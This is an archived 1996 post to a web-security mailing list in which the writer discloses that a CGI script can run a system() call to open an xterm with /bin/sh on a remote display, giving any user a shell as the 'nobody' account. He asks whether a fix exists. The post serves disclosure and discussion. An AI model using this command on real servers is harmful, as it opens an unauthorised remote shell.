[3663] in WWW Security List Archive
Hole: nobody shell
daemon@ATHENA.MIT.EDU (Andrea Di Fabio)
Tue Dec 3 14:04:27 1996
Date: Tue, 3 Dec 1996 11:46:21 -0500 (EST)
From: Andrea Di Fabio <fabio@cs.odu.edu>
To: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
I was experimenting with cgi scripts when I came up with this idea:
What if I have a cgi script which does the followin:
system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
I can now pop an exterm on my display as nobody.
This way any user can gain access to the nobody account and
have fun with it...
Has this been discussed anywhere?
Is there a fix out there?
fabio.
